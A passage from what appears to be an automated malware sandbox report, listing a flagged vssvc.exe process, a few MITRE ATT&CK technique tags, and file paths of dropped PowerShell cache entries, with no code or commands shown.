C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1632

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads